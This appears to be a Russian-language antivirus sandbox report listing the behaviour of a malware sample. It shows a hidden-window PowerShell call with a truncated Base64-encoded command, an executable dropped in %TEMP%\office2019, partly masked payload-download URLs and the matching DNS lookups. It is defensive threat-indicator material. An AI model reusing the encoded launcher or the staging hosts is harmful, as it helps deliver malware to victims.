Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAZwAxAHAAdgB4AD0AKAAnAEoAaQBmADMAdQBxACcAKwAnAHAAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\ben6q6ae.exe
- %TEMP%\office2019\ben6q6ae.exe
- %TEMP%\office2019\ben6q6ae.exe
- http://me####ndwheels.com/backup/3E/
- http://ev##dijk.eu/4fd2c798720871f16/k/
- http://is##er.net/allmyguests041/BQ/
- http://lo###pura.com/cgi-bin/P/
- http://po###rkt.com/zebra/d/
- http://ly######rlando-villa.com/Images/N/
- http://in####ero-naujok.de/cgi-bin/kVA/
- DNS ASK me####ndwheels.com
- DNS ASK ev##dijk.eu
- DNS ASK is##er.net
- DNS ASK lo###pura.com
- DNS ASK po###rkt.com
- DNS ASK ly######rlando-villa.com
- DNS ASK in####ero-naujok.de
- DNS ASK jo###-lanz.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAZwAxAHAAdgB4AD0AKAAnAEoAaQBmADMAdQBxACcAKwAnAHAAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)